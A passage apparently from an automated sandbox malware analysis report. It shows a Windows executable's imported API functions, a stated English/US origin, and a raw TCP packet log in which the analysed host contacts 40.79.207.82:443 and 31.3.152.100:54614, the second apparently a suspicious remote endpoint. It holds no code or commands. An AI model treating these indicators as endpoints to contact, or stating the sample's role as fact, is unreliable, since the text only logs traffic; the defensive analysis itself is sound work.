                                        kernel32.dll | lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
                                        version.dll | VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
                                        gdi32.dll | UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SelectClipRgn, SaveDC, RestoreDC, RectVisible, RealizePalette, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
                                        user32.dll | CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
                                        kernel32.dll | Sleep
                                        oleaut32.dll | SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
                                        ole32.dll | CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoTaskMemFree, ProgIDFromCLSID, StringFromCLSID, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
                                        oleaut32.dll | GetErrorInfo, GetActiveObject, SysFreeString
                                        comctl32.dll | ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create

                                        Possible Origin

                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        Sep 22, 2021 20:59:43.937911034 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.937992096 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.938025951 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.938035965 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.938082933 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.938088894 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:43.938153028 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:43.938209057 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.229084969 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.229929924 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.229937077 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230056047 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230082989 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.230201006 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230225086 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.230372906 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.230390072 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.232578039 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.232625008 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.232749939 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.232773066 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.232917070 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.232939959 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.233052015 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.233076096 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.233352900 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.233366013 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.234963894 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.234998941 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.235011101 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.235029936 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.235150099 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.235172033 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.237379074 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.237405062 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.237416983 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.237524986 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.237538099 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.237668991 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.237683058 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.237699986 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.237716913 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.237834930 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.237931967 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.240334034 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.240361929 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.240449905 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.241630077 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.241677046 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.241702080 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.241713047 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.241816998 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.362324953 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.362370014 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.363856077 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.363888025 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.363903046 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.363955021 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.369179964 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.369215965 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.369278908 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.369297028 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.369323969 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.369359016 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.370759010 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.370794058 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.370855093 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.370866060 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.370903969 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.370924950 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371042013 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371071100 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371108055 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371133089 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371155024 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371191978 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371376991 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371408939 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371474981 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371484995 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371520996 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371548891 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371658087 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371690989 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371733904 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371746063 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.371774912 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.371800900 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.493037939 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.493077040 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.493202925 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.493227005 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.493242025 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.493283987 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.498007059 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.498032093 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.498109102 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.498140097 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.498178959 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.498184919 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.500715971 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.500739098 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.500822067 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.500849962 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.500905991 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.500988960 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501008987 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501081944 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501101971 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501113892 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501146078 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501276016 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501308918 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501372099 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501391888 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501427889 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501465082 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501595020 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501615047 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501678944 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501693010 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.501713037 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.501739979 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.622119904 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.622162104 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.622286081 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.622302055 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.622338057 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.622366905 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.622482061 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.622492075 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.622544050 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.627161026 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.627260923 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:44.629441023 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.629548073 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.650088072 CEST49754443192.168.2.440.79.207.82
                                        Sep 22, 2021 20:59:44.650124073 CEST4434975440.79.207.82192.168.2.4
                                        Sep 22, 2021 20:59:56.098268986 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:56.249877930 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:56.257397890 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:56.293950081 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:56.752469063 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:56.753065109 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:56.753104925 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:56.837333918 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:56.904649019 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:56.943237066 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:56.943368912 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:56.956116915 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:56.988424063 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:56.989878893 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.162231922 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:57.166995049 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.401515007 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:57.516264915 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:57.523544073 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.675363064 CEST546144975731.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:57.678833008 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.681319952 CEST4975954614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.716711998 CEST4975754614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.829201937 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:57.829329967 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.830471039 CEST546144975931.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:57.830585957 CEST4975954614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.910927057 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:57.933248043 CEST4975954614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:58.138159990 CEST546144975931.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:58.330447912 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:58.491094112 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:58.531440020 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:58.681126118 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:58.703310013 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:58.896213055 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:58.896301031 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.061013937 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061043978 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061062098 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061083078 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061104059 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061124086 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061146975 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061167955 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061208010 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.061269045 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.061300039 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061320066 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.061362982 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.085072994 CEST546144975931.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.124481916 CEST4975954614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.212388992 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212415934 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212446928 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212466002 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212486029 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212505102 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212517023 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.212523937 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212539911 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212560892 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212575912 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212579966 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.212594986 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212615013 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212635040 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212635994 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.212672949 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.212676048 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.212768078 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.215224981 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.215253115 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.215392113 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.379282951 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.379357100 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.379426956 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380052090 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.380085945 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380142927 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380203962 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380264044 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380321980 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380414009 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380462885 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380517960 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380554914 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380654097 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380717993 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380778074 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380784035 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.380841970 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380904913 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380954981 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.380991936 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.381005049 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381052017 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381113052 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381170034 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381207943 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381268024 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381310940 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381314993 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.381373882 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381412983 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.381431103 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381494045 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381516933 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.381556034 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381613970 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381619930 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.381675005 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381716967 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.381730080 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381804943 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381839991 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 20:59:59.381860971 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 20:59:59.381899118 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.144785881 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.144826889 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.144875050 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.145153046 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.145176888 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.145200014 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.145220995 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.145231009 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.145258904 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.145263910 CEST4975854614192.168.2.431.3.152.100
                                        Sep 22, 2021 21:00:00.145343065 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.145368099 CEST546144975831.3.152.100192.168.2.4
                                        Sep 22, 2021 21:00:00.145395994 CEST4975854614192.168.2.431.3.152.100
